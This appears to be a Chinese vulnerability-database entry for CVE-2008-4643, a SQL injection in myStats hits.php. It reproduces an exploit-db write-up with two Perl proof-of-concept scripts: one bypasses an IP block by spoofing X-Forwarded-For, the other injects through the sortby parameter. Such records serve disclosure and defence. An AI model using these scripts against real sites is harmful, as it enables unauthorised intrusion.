myStats 'hits.php' sortby参数SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116414 漏洞类型 SQL注入
发布时间 2008-10-15 更新时间 2009-01-29
CVE编号 CVE-2008-4643 CNNVD-ID CNNVD-200810-344
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/6759
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200810-344
|漏洞详情
myWeblandmyStats中的hits.php存在SQL注入漏洞,远程攻击者可以借助sortby参数执行任意的SQL指令。
|漏洞EXP
# myStats (hits.php) Multiple Remote Vulnerabilities Exploit
# url: http://mywebland.com/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Greetz To: All Hackers and milw0rm website

---------------------
Break System Block IP
---------------------

<<hits.php>>

7: if (@getenv("HTTP_X_FORWARDED_FOR")) 

   { $u_ip = @getenv("HTTP_X_FORWARDED_FOR"); } 

   else { $u_ip = @getenv("REMOTE_ADDR"); } 



   if ($u_ip == BLOCK_IP) 

    { return 1; 

13:  exit; } 

<<config.php>>

11: define("BLOCK_IP", "127.0.0.1"); 

<<exploit.pl>>

use HTTP::Request;
use LWP::UserAgent;

my $web="http://localhost/hits.php";
my $ua=LWP::UserAgent->new();
$ua->default_header('X-Forwarded-For' => "127.1.1.1");
my $respuesta=HTTP::Request->new(GET=>$web);
$ua->timeout(30);
my $response=$ua->request($respuesta);
$contenido=$response->content;
if ($response->is_success)
{
open(FILE,">>results.txt");
print FILE "$contenido\n";
close(FILE);
print "\n[+] Exploit Succesful!\n\n";
}
else
{
print "\n[-] Exploit Failed!\n\n";
}

<<proof of concept>>

$ua->default_header('X-Forwarded-For' => "127.1.1.1"); --> BREAK BLOCK_IP

-------------
SQL Injection
-------------

<<hits.php>>

63: if (isset($_GET['sortby']))

    {$sortby = $_GET['sortby'];}

    else

    { $sortby =  'timestamp' ;}


    $sql = "SELECT * FROM " . LOG_TBL . " ORDER BY " . $sortby." DESC LIMIT 0, ". DISPLAY_LOG_NO ;

69: $querylog = mysql_query($sql) or die("Line 117 Cannot query the database.<br>" . mysql_error());

<<exploit.pl>>

use HTTP::Request;
use LWP::UserAgent;

my $web="http://localhost/hits.php?sortby=1'";
my $ua=LWP::UserAgent->new();
my $respuesta=HTTP::Request->new(GET=>$web);
$ua->timeout(30);
my $response=$ua->request($respuesta);
$contenido=$response->content;
if ($response->is_success)
{
if($contenido =~ /You have an error in your SQL syntax;/)
{
print "\n[+] Exploit Succesful!\n";
print "\n[+] Content:\n";
print "$contenido\n\n";
}
}
else
{
print "\n[-] Exploit Failed!\n\n";
}

# milw0rm.com [2008-10-15]
|参考资料

来源:XF
名称:mystats-hits-sql-injection(45917)
链接:http://xforce.iss.net/xforce/xfdb/45917
来源:BID
名称:31772
链接:http://www.securityfocus.com/bid/31772
来源:MILW0RM
名称:6759
链接:http://www.milw0rm.com/exploits/6759
来源:SREASON
名称:4455
链接:http://securityreason.com/securityalert/4455
来源:SECUNIA
名称:32289
链接:http://secunia.com/advisories/32289